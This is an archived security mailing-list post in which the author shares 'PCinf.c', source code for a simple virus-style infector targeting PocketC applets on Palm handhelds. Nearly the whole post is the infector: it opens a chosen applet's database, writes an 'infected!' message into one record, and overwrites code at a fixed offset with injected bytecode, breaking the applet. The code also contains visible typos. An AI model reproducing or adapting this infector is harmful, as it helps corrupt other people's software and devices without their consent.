lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
From: qobaiashi at gmx.net (qobaiashi@....net)
Subject: // playing pocketc woops

there was a typo in the code..

take this one:

// PCinf.c

/*
  this is a simple code infector
  for pocketc running on palm
  compatible hardware.

  it injects a string printing
  code.
  you can also use the launch()
  code and exec eg. "memo"..

  unpleasant side effects:
  *atm the applet gets "unusable"
   for its normal purpose :>
  *bigger applets crash due to
   this buggy "ret" thingie..

  by qobaiashi

*/

#define LOCATION 0x1d

main()
{
string name,
code[11] =
{"\x03\x90\x05\x07\x28\x01
\x2c\x2b\x2f\x29\x00"};
msg[12] =
// 1st byte = strlen!
{"\x0ainfected!\n\x00"};
int dbcntr = 0, cntr, record, size,
r2size;
char patch;
pointer ptr;

clear();
puts(" ---PCinf--- \n");
puts("   PocketC   \n");
puts("  infector   \n");
puts(" by qobaiashi\n\n");

name = gets("Applet to infect:");
if (strlen(name) == 0)
   {
    puts("[!] i need a victim..\n");
    launch("PktC");
    }

puts("[*] using applet: "+name+
                              "\n");
// opening said database
dbopen(name);

//---string infector section---\\
//write a string into #2

// set record number:
record = 2;
dbrec(record);

dbcntr = dbsize();
r2size = dbcntr;// for patching..

puts("using record "+record+"\n");
puts("record size = "+dbcntr+"\n";
// set offset in current record
dbseek(dbcntr);

puts("location is "+dbpos()+"\n\n");
size = strlen(msg);

ptr = msg+size;
dbwritex(ptr, 'c');
ptr = msg;
dbwritex(ptr, 'ssize');

//---code infector section---\\
// set record number
record = 0;
dbcntr = dbsize();
puts("using record "+record+"\n");
puts("record size = "+dbcntr"\n");

// set offset in current record
dbseek(LOCATION);
puts("location is "+dbpos()+"\n\n");

// write out hostile code
ptr = code;
dbwritex(ptr, 'ssize');

// patch 0x00 into code
ptr = code + size;
dbseek(LOCATION+1);
dbwritex(ptr, 'c');

// patch string offset in #2 into code
dbseek(LOCATION+2);
patch = r2size;
dbwritex(&patch, 'c');

dbclose();
puts(" infection done!\n");
}


-- 
COMPUTERBILD 15/03: Premium-e-mail-Dienste im Test
--------------------------------------------------
1. GMX TopMail - Platz 1 und Testsieger!
2. GMX ProMail - Platz 2 und Preis-Qualit?tssieger!
3. Arcor - 4. web.de - 5. T-Online - 6. freenet.de - 7. daybyday - 8. e-Post

Powered by blists - more mailing lists